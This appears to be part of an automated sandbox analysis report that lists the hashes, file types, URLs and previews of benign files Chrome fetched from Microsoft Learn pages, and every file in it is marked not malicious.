                                                                                                                                                                                  SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                  MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                  SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                  SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                  SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                  Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:HMB:k
                                                                                                                                                                                  MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                  SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                  SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                  SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                  Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25441
                                                                                                                                                                                  Entropy (8bit):5.152769469811509
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                  MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                  SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                  SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                  SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):195712
                                                                                                                                                                                  Entropy (8bit):5.430058240656712
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVlis:Wof3G0NSkNzMeO7z/l3ll
                                                                                                                                                                                  MD5:A307DE6214648B16414DC641D7399066
                                                                                                                                                                                  SHA1:63980CBC7F3DF8838611519460B570EA50BF5751
                                                                                                                                                                                  SHA-256:99B65058137EDB2B63400C273F6F5A064E3B0244152B916FD8C3C7C3818D9D93
                                                                                                                                                                                  SHA-512:EE879CC90BF7EF0BE89670D0F0D7F6A85A37324D0C892694D78AE81A28692BE6045A0B59588549533D9AC8E6FC91978778999E37942B530E979D403D95E2D0CD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                  Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):25441
                                                                                                                                                                                  Entropy (8bit):5.152769469811509
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                  MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                  SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                  SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                  SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                  Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15427
                                                                                                                                                                                  Entropy (8bit):7.784472070227724
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                  MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                  SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                  SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                  SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):52717
                                                                                                                                                                                  Entropy (8bit):5.462668685745912
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                  MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                  SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                  SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                  SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1432
                                                                                                                                                                                  Entropy (8bit):4.986131881931089
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                  MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                  SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                  SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                  SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                  Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52717
                                                                                                                                                                                  Entropy (8bit):5.462668685745912
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                  MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                  SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                  SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                  SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                  Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1173007
                                                                                                                                                                                  Entropy (8bit):5.503893944397598
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                  MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                  SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                  SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                  SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                  Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):13339
                                                                                                                                                                                  Entropy (8bit):7.683569563478597
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                  MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                  SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                  SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                  SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1817143
                                                                                                                                                                                  Entropy (8bit):5.501007973622959
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                  MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                  SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                  SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                  SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                  Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5644
                                                                                                                                                                                  Entropy (8bit):4.785769732002188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                  MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                  SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                  SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                  SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                  Malicious:false
